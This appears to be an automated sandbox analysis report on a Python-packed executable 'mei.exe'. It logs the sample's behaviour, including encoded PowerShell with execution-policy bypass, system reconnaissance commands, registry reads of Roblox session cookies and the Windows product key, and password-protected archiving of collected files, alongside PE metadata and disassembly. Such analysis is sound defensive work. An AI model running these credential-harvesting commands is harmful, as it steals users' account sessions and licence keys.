              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.cmdline
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6964.tmp" "c:\Users\user\AppData\Local\Temp\wgovk1sp\CSC886C9BC3BEB4426790141765FCC41D4.TMP"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe a -r -hp"netomahserkral" "C:\Users\user\AppData\Local\Temp\XiW2X.zip" *
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: mei.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: mei.exeStatic file information: File size 8593769 > 1048576
              Source: mei.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: mei.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: mei.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: mei.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: mei.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: mei.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: mei.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: mei.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653504776.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: mei.exe, 00000000.00000003.1649574507.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: mei.exe, 00000001.00000002.2040733721.00007FFE007D4000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652543301.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653092654.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: mei.exe, 00000000.00000003.1650835527.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: mei.exe, 00000001.00000002.2042234592.00007FFE11EC1000.00000040.00000001.01000000.00000007.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653092654.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651868024.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1654022915.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: mei.exe, 00000000.00000003.1648814033.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652658950.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: mei.exe, 00000001.00000002.2041525721.00007FFE1025C000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652071686.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1649338725.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: mei.exe, 00000000.00000003.1654022915.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: mei.exe, 00000000.00000003.1650338717.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652543301.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: mei.exe, 00000000.00000003.1647535631.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2043271260.00007FFE1A461000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651287443.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651679430.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: mei.exe, 00000001.00000002.2042619049.00007FFE130C1000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652173904.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1648814033.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653415930.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1654133646.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652354604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651177435.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652173904.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: mei.exe, mei.exe, 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: mei.exe, 00000001.00000002.2040881972.00007FFE0E151000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653247212.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: mei.exe, mei.exe, 00000001.00000002.2038251187.00007FFDFB132000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: mei.exe, 00000000.00000003.1647535631.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2043271260.00007FFE1A461000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652750361.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1650835527.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652354604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653329931.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1650338717.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651868024.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: mei.exe, 00000000.00000003.1649158066.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: mei.exe, 00000001.00000002.2041297975.00007FFE101D1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdb source: mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: mei.exe, 00000000.00000003.1649338725.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653415930.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652750361.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1648931758.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: mei.exe, 00000001.00000002.2042063741.00007FFE11EA1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1649158066.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: mei.exe, 00000001.00000002.2040733721.00007FFE007D4000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: mei.exe, 00000001.00000002.2041795080.00007FFE10301000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: mei.exe, 00000001.00000002.2037809311.00007FFDFAD80000.00000040.00000001.01000000.00000014.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652071686.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: mei.exe, 00000000.00000003.1649574507.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: mei.exe, 00000000.00000003.1648931758.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: mei.exe, mei.exe, 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653329931.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651177435.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: mei.exe, 00000001.00000002.2039190548.00007FFDFB63B000.00000040.00000001.01000000.00000005.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653247212.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: mei.exe, 00000000.00000003.1654133646.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652658950.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: mei.exe, 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: mei.exe, 00000001.00000002.2041525721.00007FFE1025C000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651287443.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: mei.exe, 00000001.00000002.2042441121.00007FFE12E11000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651679430.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653504776.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: mei.exe, 00000001.00000002.2041096731.00007FFE0EB41000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: mei.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: mei.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: mei.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: mei.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: mei.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: api-ms-win-core-console-l1-1-0.dll.0.drStatic PE information: 0x975A648E [Sun Jun 19 20:33:18 2050 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.cmdline
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.cmdline
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFB287B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFB287B30
              Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1c9f2
              Source: wgovk1sp.dll.57.drStatic PE information: real checksum: 0x0 should be: 0xe466
              Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x5092b
              Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x11c85
              Source: libcrypto-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x192b2f
              Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x24a43
              Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x219f7
              Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x13929
              Source: libffi-8.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
              Source: mei.exeStatic PE information: real checksum: 0x83263e should be: 0x838534
              Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xd294
              Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1a544
              Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x16ee9
              Source: libssl-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x396d1
              Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x9006
              Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x15efe
              Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x9c034
              Source: .scr.1.drStatic PE information: real checksum: 0x83263e should be: 0x838534
              Source: python311.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1a0ee3
              Source: mei.exe Static PE information: section name: _RDATA
              Source: VCRUNTIME140.dll.0.dr Static PE information: section name: _RDATA
              Source: libffi-8.dll.0.dr Static PE information: section name: UPX2
              Source: .scr.1.dr Static PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC75C31 push r10; ret 1_2_00007FFDFAC75C33
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC77630 push rbp; retf 1_2_00007FFDFAC77649
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC78F28 push rsp; iretq 1_2_00007FFDFAC78F29
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC77F53 push rbp; iretq 1_2_00007FFDFAC77F54
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC75E58 push rdi; iretd 1_2_00007FFDFAC75E5A
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC75F56 push r12; ret 1_2_00007FFDFAC75F6E
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC75EFA push r12; ret 1_2_00007FFDFAC75F07
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC75DF7 push r10; retf 1_2_00007FFDFAC75DFA
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC75CE0 push r10; retf 1_2_00007FFDFAC75CE2
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC77FEB push r12; ret 1_2_00007FFDFAC78036
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC75CE5 push r8; ret 1_2_00007FFDFAC75CEB
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC75E0F push rsp; ret 1_2_00007FFDFAC75E17
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC7930D push rsp; ret 1_2_00007FFDFAC7930E
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC75CFE push rdx; ret 1_2_00007FFDFAC75D01
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC75D06 push r12; ret 1_2_00007FFDFAC75D08
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC78405 push r10; retf 1_2_00007FFDFAC78471
